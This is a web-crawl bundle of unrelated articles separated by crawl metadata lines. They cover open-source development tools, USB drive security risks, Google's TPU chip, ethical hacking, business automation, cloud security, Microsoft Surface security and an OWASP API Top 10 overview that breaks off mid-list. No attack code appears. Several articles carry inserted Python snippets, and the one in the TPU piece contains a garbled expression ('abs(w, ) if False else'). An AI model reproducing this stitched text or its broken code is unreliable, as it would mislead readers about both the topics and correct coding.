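cur.executemany("INSERT INTO users (name) VALUES (?)",
                [("alice",), ("bob",)])
conn.commit()

cur.execute("SELECT name FROM users ORDER BY name")
names = [row[0] for row in cur.fetchall()]
conn.close()
print(names)  # -> ['alice', 'bob']
```

The parameter placeholder (`?`) varies by driver, but the cursor-based workflow is shared across open-source and commercial databases alike.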
For more information about MySQL, visit http://www.mysql.org/.
Source code control is always an integral part of any development effort. The Concurrent Versions System, or CVS, available at http://www.cvshome.org/, is the open-source standard for source code control. Virtually all open-source software projects make their code available via a CVS repository.
CVS runs on numerous platforms, including Red Hat Linux, Win32, Mac OS X, and some versions of VMS. There is a cross-platform Java version available, as well.
CVS is usually used as a command-line tool, but various open-source GUI interfaces exist for several platforms. Also, CVS can interface directly with Ant (see below for details).
Who among us hasn’t struggled with “make” files? The amount of time spent figuring out whether a command didn’t execute because of a pesky leading space must have cost companies millions. In response to this problem, James Duncan Davidson, the original author of Apache Tomcat, created a cross-platform build tool called Ant (“Another Neat Tool”) to overcome the problems with “make”, “jam”, and their cousins. Ant has been a standby for Java developers since its first release, version 1.1, in July 2000.
Ant automates the build and deployment process for Java developers, allowing tasks such as directory cleanup and creation, code check-out, compilation, file copying, JARring and WARring files, and even running JUnit test cases. The complete functionality of Ant is too extensive to discuss here, but visiting http://ant.apache.org/ will provide more information. If the functionality provided in Ant is not sufficient, Ant allows developers to create their own custom tasks.
Eclipse is a cross-platform, Java-based development environment. Although the creators of Eclipse originally developed this environment with Java in mind, Eclipse provides a plug-in interface that allows the IDE to be used for other languages, as well. Currently, the official Eclipse Tools Project has plug-ins for C/C++, COBOL, and, of course, Java, but a host of community-based plug-ins exist for other languages and development tools, as well as for JSP, servlet, and Struts development.
Currently, Eclipse is available on various Linux flavors, Win32, and Solaris, but, provided that a Java Virtual Machine exists for your platform, you may still be able to use this IDE.
Perl, sometimes called “the duct tape of the Internet”, is perhaps the granddaddy of all open-source programming languages. It was developed back in 1987 by Larry Wall. Now, according to http://www.perl.org, Perl has over a million users, and is a widely used tool for Common Gateway Interface (CGI) scripting, which allows web servers to extend their processing capabilities beyond simply serving up web pages.
Perl is an interpreted language, and thus can run on any operating system that has a Perl interpreter. It includes many useful features, including extremely powerful regular-expression and string-manipulation functions, database connectivity, and the ability to link to C/C++ native libraries. Developers can write Perl programs either procedurally or in the object-oriented paradigm.
Python is a cross-platform, object-oriented, extensible scripting language used widely for Internet development. It supports features such as regular expressions, advanced string processing features, Internet protocols (HTTP, SMTP, POP, and so forth), unit testing, logging, Python language parsing, and operating system calls in the standard language libraries. The language itself is extensible in either C or C++.
Python’s author, Guido van Rossum, originally wrote Python in response to complaints he had about an interpreted language he used back in 1989. The first official release of Python came out in 1991, and the language has gained popularity as a CGI language in recent years.
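To give a small taste of the regular-expression and string-processing support mentioned above (a hypothetical snippet; the log format and field names here are invented purely for illustration):

```python
# Hypothetical example: extract the paths of failed requests from
# web-server log lines using Python's standard re module.
import re

log_lines = [
    '192.0.2.1 - - "GET /index.html" 200',
    '192.0.2.7 - - "GET /missing.html" 404',
]

# Named groups make the extracted fields self-describing.
pattern = re.compile(r'"(?P<method>\w+) (?P<path>\S+)" (?P<status>\d{3})$')

failed_paths = []
for line in log_lines:
    match = pattern.search(line)
    if match and match.group("status").startswith(("4", "5")):
        failed_paths.append(match.group("path"))

print(failed_paths)  # -> ['/missing.html']
```

The same kind of one-pass text extraction is the bread and butter of CGI scripting in Perl, Python, and PHP alike.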
PHP is a powerful, object-oriented scripting language primarily used for generating dynamic web pages. The language combines syntactic features from C, Java, and Perl, and has extensive string-processing, Internet-protocol, and database support. PHP is also easily extendable, with thousands of modules available in the PHP community.
PHP was originally developed as a Perl extension by Rasmus Lerdorf to fulfill his own personal web site needs. After some additional development, Lerdorf realized the potential for the language, and, along with others, began the development of PHP as it exists today. According to http://www.php.net/, PHP powers millions of Internet sites, accounting for up to 20% of all sites on the Web.
Unit testing has always been a necessary evil for software developers. Now, JUnit, a unit-testing tool for Java developers, can take some of the drudgery out of this important task.
JUnit is basically a Java framework for creating assertion-based test cases, sharing test data, running test suites automatically, and verifying the results. By extending JUnit classes, developers can test their business logic by simply running the JUnit test suite, just like any other Java program. Since developers code the expected outcome into each test case, no human intervention is required to determine which test cases passed and which failed.
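The xUnit pattern that JUnit established (subclass a test-case base class, write assertion-bearing test methods, and let a runner collect the results) can be sketched with Python's standard unittest module, itself a direct port of JUnit. It is shown here only because it needs no external libraries; the Java original is structurally identical:

```python
import unittest

def add(a, b):
    """Toy 'business logic' under test; stands in for real application code."""
    return a + b

class AddTest(unittest.TestCase):
    # Analogous to extending junit.framework.TestCase in Java: each test
    # method codes its expected outcome directly into an assertion.
    def test_positive(self):
        self.assertEqual(add(2, 3), 5)

    def test_negative(self):
        self.assertEqual(add(-2, -3), -5)

# The runner collects every test in the suite and reports passes and
# failures with no human intervention.
suite = unittest.defaultTestLoader.loadTestsFromTestCase(AddTest)
result = unittest.TextTestRunner(verbosity=2).run(suite)
print(result.wasSuccessful())  # -> True
```

In Java, the equivalent suite would be run by Ant's junit task or by JUnit's own test runner.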
For more information about JUnit, visit http://www.junit.org/.
No matter how carefully development is done, bugs always creep into the system. Bugzilla is an open-source defect tracking system based on Perl that incorporates many of the features of expensive commercial products. Some features include inter-bug dependency graphing, advanced reporting capabilities, a stable RDBMS back-end, support for email, XML, console, and HTTP APIs, and integration with various version management systems, including CVS.
Bugzilla still has some challenges ahead. Most notably, future enhancements include adding more flexibility to the bug reporting portion of the application, as well as addressing performance problems in a few areas. Still, Bugzilla is a robust, widely-used defect tracking system that is fast becoming an industry standard.
For more information about Bugzilla, visit http://www.bugzilla.org/.
While JUnit is used to test business logic, Cactus, part of the Apache Jakarta Project, is used to test server-side Java code, such as servlets, JSPs, and EJBs. The framework extends the capabilities of JUnit so that appropriate HTTP requests are sent to the server, where the processing occurs, and the server-side output is then returned to Cactus. Developers must extend the Cactus classes, as well as write JUnit test suites, to perform their tests.
For more information about Cactus, visit http://jakarta.apache.org/cactus.
The OpenOffice productivity suite is an open-source alternative to the Microsoft Office productivity suite. Although the default format for OpenOffice documents is XML, OpenOffice can read and write documents in MS Office-compatible formats, and can also export to PDF and Flash formats. OpenOffice is also compatible with Sun Microsystems’ StarOffice suite, a commercial offering based on OpenOffice 1.1 with a few more bells and whistles.
OpenOffice includes a word processor, spreadsheet, presentation tool, drawing tool, and a database tool. Additionally, OpenOffice supports a variety of languages, and allows vertical and bi-directional writing, which are common in languages such as Hebrew and Japanese.
OpenOffice also supports user macros, which can be used to perform simple, repetitive tasks. For more complex tasks, users can extend OpenOffice with the OpenOffice SDK, using a wide variety of programming languages, such as C++, Java, Basic, OLE, and XML. Third-party vendors can further extend OpenOffice’s capabilities by implementing tools using the OpenOffice Add-On Framework.
Mozilla is arguably the most popular open-source web browser/email program. It offers features similar to the Netscape Communicator suite (in fact, Netscape 7.x is based on Mozilla). These features include a web browser, email and newsgroup reader, web page composer, address book, and chat program.
Mozilla Firebird is another open-source browser, based on the Mozilla code base. Firebird is not simply a standalone version of the Mozilla browser included in the Mozilla suite; the user interface, as well as some features, are significantly different.
Likewise, the Mozilla Thunderbird email reader is an open-source mail reader based on the Mozilla codebase. The user interface and customization options are different from those offered by the Mozilla email client.
For more information about these products, visit http://www.mozilla.org/.
Amaya is an open-source browser/editor offered by the W3C. The project began as an HTML 4.0/CSS browser and editor, but has since expanded to include XML, XHTML, MathML, and SVG. The ultimate goal is to incorporate as many technologies endorsed by the W3C as possible into the product. For more information about Amaya, visit http://www.w3.org/amaya.
In this article, we have discussed what open-source software is, what’s out there, and where to find it. The open-source software products discussed here are only the tip of the iceberg. There is a vast world of open-source software out there to be explored, free for the taking. | <urn:uuid:8f0ca0cd-31a6-4f87-b623-6148721d9fce> | CC-MAIN-2022-40 | https://it-observer.com/surveying-open-source-landscape.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00294.warc.gz | en | 0.925639 | 4,879 | 3.390625 | 3 |
Tiny, almost undetectable and with almost limitless powers to wreak havoc on your network: USB drives are like thousands of back doors through which malicious code can sneak in and confidential data can gush out whenever your back is turned.
The rise in popularity of USB flash memory drives over the last few years has been as inexorable as their falling prices. Instantly recognized by Windows XP or Mac OS X without the need to install any drivers, they can be used to copy gigabytes of data from your network, or to introduce applications, data, viruses and malware in a matter of minutes. In fact, it’s not just flash drives that are a problem. Any MP3 player with a USB interface – and that includes almost all players, including Apple’s iPod – can also be used as a data storage medium, with the potential to hold tens of gigabytes of information that can be transferred to or from the network. IDC predicts that sales of mini-hard disks – most of them portable devices and many built in to MP3 players – will increase by 500 per cent to 100 million units a year by 2008.
Since anyone can install a USB drive by simply plugging it into a USB port – you don’t need to be an administrator in Windows XP or 2000 – and since USB devices can’t be managed using Group Policy, this presents a very serious security problem from a network administrator’s point of view.
Here are the main potential problems that USB devices present:
Viruses. For the last ten years or so, most viruses have come from the Internet, and network administrators have been able to confront them using a variety of methods, including email scanners and firewalls to block suspect sites. But USB drives make it easy to bypass these defenses by introducing software and data straight onto network PCs.
Other malware. Because of their vast capacity, it’s easy to use USB devices to introduce pornography and other inappropriate video clips, illegally copied MP3 files, bandwidth-hogging peer-to-peer file-swapping applications, and spyware onto the network.
Data theft. Again because of their capacity, USB devices are ideal for copying price lists, entire customer databases, product designs and any other confidential information. Employees armed with a keyring-sized flash device could walk out of the office with most of a company’s information assets on a tiny and almost undetectable device.
Loss of confidential information. In many organizations, employees find it tempting to load data onto USB drives to take home with them to use on a desktop machine rather than carrying a laptop between work and home. But being much smaller, they are far more likely to drop out of a bag or pocket unnoticed. Consequences can range from inconvenience and bad publicity to serious commercial setbacks or even regulatory penalties and legal action.
So what can be done?
For organizations where the primary concern is theft of data by employees, it’s necessary to look to third-party security software. Products such as SecureWave’s Sanctuary Device Control give network administrators complete control over every I/O port on every Windows PC on the network on which the Sanctuary client software is installed. Using a centralized database, it’s possible to grant permissions for particular users to use specific devices – the secure USB drive issued by the IT department, for example. For compliance and security purposes each data transfer can be logged, so administrators know which user is copying data and when, and an exact copy of the data transferred can also be stored. The software is relatively inexpensive – about $30 per user – and for some organizations it may be worth investing in. It is up to you, however, to determine that the software you select is secure enough and can be relied upon not to be easily bypassed.
This sort of software may not suit your organization, or it may be that you are more concerned about the accidental introduction of viruses onto your network than data theft, so it’s worth examining other solutions. These are likely to involve many parts of the company including IT, HR, and possibly even the legal department.
The best way to tackle the USB drive problem is probably to recognize that many of the people who use USB storage devices are not doing so maliciously – they just see them as neat gadgets for moving apps and data around. So educating users about the dangers of USB devices – viruses, data loss and so on – should be a first priority.
Since USB flash memory sticks are convenient, the chances are that some employees will still want to use them, even when they are aware of the risks. It is probably better to control rather than prohibit their use by making them available, through the IT department, to those who really benefit from them. There should then be a clearly stated corporate policy indicating that employees’ own USB drives, including MP3 players, are not to be connected to corporate PCs – only drives issued by the IT department should be permitted. The legal and HR departments may have to become involved if rules about employees’ own USB drives are to be enforced, but it is probably impractical to try to prevent employees from bringing their iPods in to the workplace to listen to at lunch time just because they could connect them to their PCs.
How does this help? Because the IT department can issue flash drives, such as Lexar’s JumpDrive Secure, which offer password protection and 256-bit AES data encryption, so that even if the device is lost or stolen, the data stored on it is inaccessible. For greater protection, drives which include a biometric fingerprint scanner are also available. Staff who are issued with USB drives to transfer data should also be educated to scan them for viruses regularly.
Deciding exactly what steps to take to minimize the risks posed by USB drives is a tricky task, and there is no one-size-fits-all solution. Every organization’s needs are different, and the costs and benefits of particular measures have to be assessed individually. As USB drives become ubiquitous it seems inevitable that most operating systems will, in the future, provide some way for network administrators to control their use quickly and easily. But until then these handy little devices will continue to be a security risk and should not be ignored. | <urn:uuid:c3ff0325-2a73-4db3-8782-94b0372bcc9e> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/management/close-your-networks-portable-back-door/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00294.warc.gz | en | 0.955476 | 1,267 | 2.59375 | 3 |
Last October, a computer system beat a professional human player at the ancient Chinese board game Go. The AI system, AlphaGo, was built by Google and trained using machine learning techniques.
Google built the hardware that powered AlphaGo in-house, as it does with most of its infrastructure components. At the core of that hardware is the Tensor Processing Unit, or TPU, a chip Google designed specifically for machine learning, the company’s CEO, Sundar Pichai, said on stage this morning during the opening Google I/O conference keynote near Google headquarters in Mountain View, California.
This is the first time Google has shared any information about the hardware backend that powers its AI, which will play a central role in the company’s revamped cloud services strategy, announced earlier this year. TPUs are part of the infrastructure that supports its cloud services.
The company has been running the chips in its data centers for about a year, Norm Jouppi, distinguished hardware engineer at Google, wrote in a blog post. The chips run as accelerators, delivering performance "roughly equivalent to fast-forwarding technology about seven years into the future (three generations of Moore’s Law)," he wrote.
Pichai shared little detail about the TPU, saying only that its performance per watt was “orders of magnitude higher” than any commercially available CPU or GPU (Graphics Processing Unit):
Google CEO Sundar Pichai on stage at Google I/O 2016 (Source: Google I/O live stream)
“Tensor Processing Unit (TPU) is a custom ASIC for machine learning that fits in the same footprint of a hard drive, and was the secret sauce for AlphaGo in Korea,” Google said in an emailed statement.
TPU gets its name from TensorFlow, the software library for machine intelligence that powers Google Search and other services, such as speech recognition, Gmail, and Photos. The company open sourced TensorFlow in November of last year.
The chip is tailored for machine learning. It is better at tolerating "reduced computational precision," which enables it to use fewer transistors per operation. "Because of this, we can squeeze more operations per second into the silicon, use more sophisticated and powerful machine learning models and apply these models more quickly, so users get more intelligent results more rapidly," Jouppi wrote.
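To see what reduced computational precision means in practice, here is a toy sketch (not Google's implementation; the scale factor and clamping scheme are simplified assumptions) of quantizing 32-bit floating-point values down to signed 8-bit integers, the kind of narrow arithmetic a TPU-style accelerator exploits to pack more operations into the same silicon:

```python
# Toy illustration only: mapping floats in [-1.0, 1.0] to 8-bit codes
# trades a small, bounded accuracy loss for much cheaper arithmetic.
def quantize(values, scale=127.0):
    """Map floats in [-1.0, 1.0] to signed 8-bit integer codes."""
    return [max(-128, min(127, round(v * scale))) for v in values]

def dequantize(codes, scale=127.0):
    """Recover approximate floats from the 8-bit codes."""
    return [c / scale for c in codes]

weights = [0.5, -0.25, 0.99]
codes = quantize(weights)      # -> [64, -32, 126]
approx = dequantize(codes)     # close to, but not exactly, the originals
worst_error = max(abs(w, ) if False else abs(w - a)
                  for w, a in zip(weights, approx))
print(codes, worst_error < 0.01)  # -> [64, -32, 126] True
```

The rounding error stays below one part in 127 per value, which is why many machine learning models tolerate this loss of precision with little effect on their predictions.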
A vibrant, connected community of ethical hackers has an important role to play in the increasingly complex fight against cyber-crime, explains Brigitte d’Heygère, Vice President Security & Consulting Services at Gemalto
Buried treasure is not just the stuff of fiction and legend. For at least some of our ancestors, it was quite simply the most effective means of protecting prized possessions from unwanted attention. And whilst the methods of defense have inevitably evolved over time, the basic game of cat and mouse between legitimate owners and those who seek to steal from them has never gone away. Of course, in an era of digitalisation, the treasure being fought over is often no longer physical. Harvesting personal data, attacking critical national infrastructures and disrupting online services are just some of the aspirations of today’s cyber-criminals. In common parlance, these 21st century bandits are often lumped together under a single, catch-all label – hackers. Equally, there is a widespread assumption that our security will be ensured simply by the application of ever-more sophisticated technologies. However, in reality, this only tells half the story. Keeping digital resources safe from cyber-attacks ultimately means harnessing the ingenuity and expertise of a diverse global family of IT and digital security specialists. What’s more, at the heart of this community is an often-overlooked citizen army – made up of hackers with a very different ethical agenda to those who usually hit the headlines.
A shifting security landscape
Whilst the science of cryptography has a history stretching back almost as far as mathematics itself, prior to the advent of the internet, it was generally the preserve of select sections of society, such as governments and the military. But with digitalisation came a paradigm shift. In a permanently connected world, the security perimeter has become highly scalable and volatile, the attack surface exponentially bigger. Instead of simply protecting a physical memory unit or processor, for example, complex networks of computers and servers, as well as the constant flow of information between them, needs to be defended.
Machine learning and Big Data are changing the rules, again
What’s more, the world continues to spin faster. The digital footprints that individuals and organisations leave in cyberspace are getting deeper. Furthermore, the advent of machine learning has now made it easier for malevolent forces to compromise and harvest this Big Data. But, at the same time, machine learning also represents a potentially powerful defense tool. In particular, its ability to predict situations and scenarios based on accumulated evidence can play a key role in detecting vulnerabilities and pre-empting attacks. A new front in the cyber-security arms race has opened.
Next on the horizon – quantum computing
As if the implications of machine learning and Big Data were not enough to contend with, yet another technology revolution is on the horizon. It comes in the form of quantum computing, which is set to redefine the limits of data processing power. In doing so, it will undermine the fundamentals on which many of our currently ‘unbreakable’ cryptographic codes are built. For the security industry, that obviously means another profound challenge: the creation of new, quantum-resistant cryptographic algorithms.
Harnessing the hackers
Given these rapidly shifting sands, the security sector has no choice but to evolve fast. And one of the most significant ways that this is being achieved is through closer collaboration with, and between, the good guys: the ethical hackers.
In terms of harnessing this key resource, we have already seen a major change in the landscape. Not so long ago, security experts were almost invariably drawn from the world of academic research. Consequently, cryptographic skills were concentrated in the hands of a relatively small circle of people, and typically paid for by governments. However, the ubiquity and accessibility of powerful IT systems has swiftly democratised the art of hacking. Subsequently, an extended community has developed, embracing both the public and private sectors, employed professionals, freelancers and talented amateurs. Moreover, whilst media attention, and consequently public fears, have tended to focus on the malevolent hackers, the energy, dynamism and co-operative approach of this ethical movement deserves to be recognised fully – and utilised as effectively as possible.
Cybersecurity Act will set new standards
There is growing recognition that, to stay one step ahead of the criminals, this exchange of ideas needs to be as comprehensive as possible. Within digital security companies, talented and dedicated digital security experts already represent a vital force. They invest their energy for good, continually and rigorously testing systems and products to identify and address any potential weak spots. By actively encouraging collaboration with the wider ethical hacking family, we are now forging an even stronger alliance between all those people who share not just the right skills, but the right principles too. Looking ahead, changes in the regulatory framework are only likely to make this approach even more worthwhile. In Europe, the forthcoming Cybersecurity Act will introduce a single means of security certification for ICT products, with levels ranging from ‘basic’ to ‘high’. Authorised hacking of products to test for any vulnerabilities will clearly be an important part of the process.
Listening, learning, sharing
To this end, the work of the ethical hacking community is being channeled not just through informal interaction, but also through major organised events and conferences. Better-known examples include Black Hat, “Nuit du Hack”, the CHES Conference, DEF CON, AppSec and Pwn2Own. Notably, many play host to hacking contests (also known as bug bounties), which challenge participants to find vulnerabilities in a system and a means of exploiting them, then reward the first team to do so.
Time to bury the stereotypes
Stereotypes are invariably difficult to dispel. But, in the case of the hacker, we should at least try to change the perception that the term applies exclusively to malevolent loners, organised criminals and the murky world of state-sponsored cyber warfare. Today, a very different type of hacker is also hard at work, helping to protect us from the manifold threats that inhabit the dark corners of cyberspace. Moreover, as the systems that must be secured become more complex, so are the skills needed to defend them. Helping to build a truly diverse ethical hacking community and fostering dialogue with the principled experts working inside the digital security industry, should therefore be an imperative for all interested parties.
To this end, reclaiming the term hacker from the bad guys, and giving this vital and dynamic community due credit, are more than symbolic gestures. Beneath them lies an understanding that, in an ever more digitalised world, greater safety and security remain rooted in the most positive elements of the human character.
Automation in business
Automation: the technique of making an apparatus, a process, or a system operate automatically
We set up our “Out of Office” notice to let people know that we cannot respond to email while we are away for vacation. This is the most basic form of automation that we perform in our businesses. Other examples include:
- Setting up systems to run reports at certain intervals and delivering them via email.
- Set up Outlook rules to file content automatically.
- Setting our phone system on night mode manually or via a schedule to let customers continue to interact with our business while we are away.
- For businesses with key card access, locking and unlocking the doors via a schedule.
- We can schedule Facebook to post content in the future down to the exact minute we specify.
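Schedule-driven automation like the examples above boils down to a time check plus an action. The following is a minimal Python sketch; the business hours and the function name are illustrative assumptions, not taken from any particular phone or access-control product:

```python
from datetime import time

def is_night_mode(now, open_at=time(8, 0), close_at=time(18, 0)):
    """Return True when the current time falls outside business hours.

    A scheduler would call this periodically to decide whether the
    phone system should answer in night mode or the doors be locked.
    """
    return not (open_at <= now < close_at)
```

A task scheduler such as cron or Windows Task Scheduler would run a check like this every few minutes and toggle the phone system, door locks, or lighting accordingly.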
There are a lot of things we are currently automating in our businesses, but what is next?
Tesla Motors has significantly moved autonomous driving forward with Autopilot. At its most basic level, driving is a process. Tesla has taken that process, along with a myriad of sensors and controls, and built logic to have them all function together seamlessly. This is far more complex than it sounds, but it is happening.
If you have a repeatable process that is already in place, you may want to think about leveraging your current technology to take the next step towards automating that process.
What should be automated:
- Tasks that are labor-intensive and provide no added value from the customer's point of view:
Most companies have line-of-business applications that the bulk of their operations run through. These applications usually include tools that can be used to streamline your processes and minimize costs caused by manual errors.
- Exception reporting to find things that are not getting done on time or falling through the cracks
- Streamlining collections to automatically send out statements once accounts are X days overdue
- Automatically compiling timesheet data and importing/exporting it directly into payroll
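The exception-reporting and collections items above share the same shape: scan the records and flag the ones past a threshold. A hedged Python sketch, where the invoice fields and the 30-day default are illustrative assumptions:

```python
from datetime import date

def overdue_accounts(invoices, today, days_overdue=30):
    """Return invoices that remain unpaid past `days_overdue` days.

    The result could feed an automated statement mailer or an
    exception report emailed to the collections team.
    """
    return [
        inv for inv in invoices
        if not inv["paid"] and (today - inv["due"]).days > days_overdue
    ]
```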
Have you looked at your application lately to see if you are taking full advantage of its capabilities?
- Processes that keep you from scaling:
If you are addressing and stamping 1,000 envelopes every month, and doing so takes two full-time employees, it may be time to look into technology that can address the envelopes and apply the postage automatically. Is emailing those same letters an option? If so, those employees can be reallocated to quality control and other tasks in your organization that are more customer focused.
Scaling then becomes an efficiency of the automation that has been put into place.
- Error-prone, customer-facing tasks:
Organizations with large campuses that are open to the general public usually have a staff member walk around turning on the lights, TVs, and other electronics to prepare for the day. In turn, that same staff member shuts everything down after hours. With the introduction of new IoT (Internet of Things) devices, you can automate this task. These devices can be scheduled to power equipment on and off at specific dates and times, usually saving energy and guaranteeing a repeatable experience for your customers.
What you decide to automate in your business is up to you. Some things perhaps should never be automated, but there are always efficiencies to be gained by making full use of your existing technology or investing in newer technology.
There has been a significant increase in cyber attacks over the last several years as malicious actors look for, as well as exploit, vulnerabilities in computer systems and network infrastructure. When found, these vulnerabilities are used to compromise the network infrastructure, often with devastating financial consequences to the impacted business. Globally, businesses have lost more than $8 billion in 2018 as a result of ransomware, an increase from $5 billion in 2017 and $325 million in 2015. With ransomware attacks on businesses occurring every 14 seconds, it is projected that the costs of ransomware attacks will exceed $12 billion by 2020.
In order to avoid being a cyber attack casualty, businesses need to adopt cloud computing as part of their cyber-security strategy. With cloud computing, relevant data is no longer stored and maintained on local network infrastructure; third-party cloud service providers assume the responsibility for the storage and maintenance of data at virtual data centers. Businesses have better protection for their data when stored in the cloud rather than on local physical networks. Discussed below are some of the reasons why cloud computing is an essential cyber-security strategy for businesses.
1. Skilled Personnel
With online threats constantly evolving as well as the increasingly sophisticated nature of cyber attacks, it is essential to engage the services of cyber-security specialists well versed in the detection and neutralization of cyber attacks. At present, however, there is an insufficient number of experienced specialists available to meet the demand. As such, businesses may have difficulty finding cyber-security specialists to look after their network. With cloud computing, businesses no longer have to worry about finding cyber-security specialists. The cloud service provider assumes the responsibility for hiring specialists with the skill-sets necessary to deal with online threats.
2. Threat Recognition
Threat recognition and neutralization are essential in keeping networks protected. When detected early, measures can be implemented to quarantine and neutralize the threat before there is significant damage to the network. The longer a threat goes undetected, the greater the degree of network compromise and damage. In cloud-based networks, unlike traditional network infrastructures, threat analysis and network monitoring is done in real-time round the clock; this allows threats to be rapidly identified. This rapid identification of potential threats thereby significantly reduces the response time and minimizes risks to the network.
3. Data Backups
Frequent regular data backups are an essential component of any effective cyber-security strategy. Data backups provide redundancies for businesses such that they can resume business operations with minimal interruptions to their processes if they eventually fall victim to a cyber attack. Storage space limitations dictate how frequently and how much data can be backed up in traditional networks. With cloud computing, data storage can be scaled up as much as needed to handle the amount of data being backed up as well as the frequency.
4. Security Updates / Upgrades
Frequent regular security software updates and upgrades are necessary for businesses to remain secure from cyber attacks. Failure to do so may result in new threats not being promptly recognized until there has been a significant compromise to a business network. With cloud computing, updates and upgrades are performed frequently to ensure that cloud security remains constantly up to date; new security tools and applications are deployed as they become available. This is in contrast to traditional physical networks where there may be a delay in the deployment of security updates which can result in a decreased ability to identify and neutralize threats.
The Bottom Line:
At Cyber Sainik, we know how essential cloud computing is to any cyber-security strategy. We have a team of experts ready and willing to work with you to develop a cloud computing strategy to keep your business secure. Contact us today for more information. | <urn:uuid:b30d7cea-9593-4f46-abef-bd0071705224> | CC-MAIN-2022-40 | https://cybersainik.com/the-importance-of-cloud-computing-in-your-cybersecurity-strategy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00494.warc.gz | en | 0.948394 | 745 | 2.6875 | 3 |
If you’re looking towards the future to keep up-to-date with current tech trends, according to Microsoft research, by the end of this year up to 25% of corporate data will flow between mobile devices and the cloud.
Unfortunately, more information flow means more cyber attacks, as each additional connection increases the opportunities for hacking. On the other hand, mobility is fantastic for business because it means employees can work on the go and aren’t limited by location or the typical 9-to-5 structure.
However, the downside is that on-premise security no longer covers these devices. Nowadays, security is essential for any business, and Microsoft Surface devices are leading the pack by implementing the best encryption technology available.
THREATS TO SECURITY
First and foremost, security requires a preventative mindset so it’s important to be aware of the risks that exist in modern technology.
- Stolen devices that are secured with a predictable password and basic security features are easily accessed and can be very dangerous when they fall into the wrong hands.
- Malvertising includes deceitful web pages, email attachments and convincingly authentic advertisements. Clicking on one of these pages – accidentally or not – can allow a hacker or cyber attacker to gain unauthorized access to a device.
- Public Wi-Fi may seem like a great idea but can lead to man-in-the-middle attacks. A hacker or cyber attacker can intercept communication between the cloud and a device when it is connected to the same Wi-Fi network.
- User error includes transferring confidential information to unapproved locations, sharing important information over unsecured emails and installing risky apps. All of these actions can open up the device to various security threats.
SOLUTIONS TO SECURITY THREATS
The first step to solving security risks is being aware of the variety of issues that may arise. Next to increasing awareness of the potential threats, learning all of the best technological solutions available to prevent these threats is crucial.
- Two-factor authentication such as fingerprint, facial or voice recognition should be used on every device in addition to an alphanumeric password. This adds an extra layer of security and means that even if a device is stolen, it will be nearly impossible to access the files on it.
- Hardware encryption means that the storage of data on your device is protected against disk cloning, boot disks or physical access. OneDrive is the built-in storage app on Surface devices. It backs up files and offers encryption to increase safety.
- Security compliance means ensuring your device meets the highest standards as decided by third-party boards. All Microsoft Surface devices are equipped with Windows Defender, a user-friendly program that protects against viruses, malware, spyware and more.
- Virtualization-based security creates a heavily controlled and specialized virtual space by combining software and hardware. This space can be used to store and transfer critical data.
- Central management is a simple solution to monitor devices, report issues and support encrypted drives. This can be done within OneDrive or Windows Defender.
Ensure peace of mind with your Microsoft Surface device by being aware of security threats and the technology that can be used to combat them. Contact Microsoft today to gain information about the Surface’s mobility and security. | <urn:uuid:5bc96b33-c226-4c06-8b32-ce2453951696> | CC-MAIN-2022-40 | https://insights.ingrammicro.ca/blog/how-to-stay-secure-and-mobile-with-the-microsoft-surface | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00494.warc.gz | en | 0.919884 | 669 | 2.703125 | 3 |
Compared to traditional web applications, the modern development process is more dynamic, relies on a rapid delivery cycle, and follows a microservice framework. Such frameworks largely depend upon Application Programming Interfaces (APIs) as one of the most crucial components. Unfortunately, while APIs offer many benefits, they are common targets of attack vectors because of the API layer’s fundamental application vulnerabilities and security risks.
This article delves into the OWASP API Top 10 list, how attack vectors exploit each security vulnerability, and the best practices to avoid them.
What is the OWASP Top 10 List, and Why is It Important for Your Business?
The Open Web Application Security Project (OWASP) is a worldwide community focused on protecting web applications and promoting secure coding practices. OWASP regularly identifies and publishes the ten most critical web application security concerns, along with their ranking and remediation guidance, in an online document called the OWASP Top 10.
Modern applications are built by coupling different programs packaged as microservices. The loosely coupled nature of such applications has made Application Programming Interfaces (APIs) the backbone of modern web and mobile development. Because APIs carry most of the web traffic in modern applications, they also act as the gatekeepers of an application's data.
Because of inherent vulnerabilities, hackers leverage several attack mechanisms to exploit APIs and connected services to steal sensitive data. The persistent threat on APIs has led to the development of OWASP API Security Top 10 – a list of top 10 security concerns specific to web APIs. This list highlights the possible security vulnerabilities and provides solutions to understand and mitigate each vulnerability.
This post explores the OWASP API top 10 List for API security.
Risks of API Vulnerabilities
While APIs offer an efficient framework for connecting various software components, they typically expose backend data to third-party entities, making them prime targets for attackers. APIs are fundamentally designed to expose application resources, which makes it convenient for threat actors to probe them and inject malicious code.
Additionally, APIs are freely available and widely documented, making it easy for hackers to perform reconnaissance, gather configuration information, and then orchestrate cybersecurity attacks. Because insecure APIs expand an application's attack surface, organizations require dedicated approaches and strategies to implement API security.
OWASP Top 10 API Vulnerabilities
The top 10 most common vulnerabilities for API security include:
Broken Object Level Authorization
APIs rely on object-level authorization to validate resource access permissions for legitimate users. The API endpoint receives the requested object ID and then implements authorization checks at the code level to ensure the user has permission to perform the requested action. APIs typically expose endpoints that handle object identifiers.
In the absence of object-level authorization checks, or when they are implemented improperly, an attacker can manipulate the object ID sent to an API endpoint; if the endpoint fails to validate that the requesting user has the required access privileges, it grants the attacker unauthorized access.
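The fix is an explicit ownership check at the code level before the object is returned. A minimal Python sketch, where the data model and function names are illustrative and not taken from any specific framework:

```python
class AuthorizationError(Exception):
    """Raised when a user requests an object they do not own."""

def get_document(user_id, doc_id, documents):
    """Fetch a document only if the requesting user owns it.

    Without the ownership check, any caller who guesses a valid
    doc_id would receive another user's data (BOLA).
    """
    doc = documents.get(doc_id)
    if doc is None:
        raise KeyError(doc_id)
    if doc["owner_id"] != user_id:  # the object-level check
        raise AuthorizationError("user may not access this object")
    return doc
```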
Broken User Authentication
By design, API endpoints must be exposed to external services and are accessed by various agents using user authentications. As a result, inadequate or improper authentication implementation at the API endpoint allows malicious users to temporarily compromise legitimate users’ authentication tokens to access sensitive information.
Broken authentication at the API endpoint can manifest in several issues. Some common misconfigurations that lead to broken authentication include:
- Insecure internal APIs
- Weak API keys with infrequent rotation
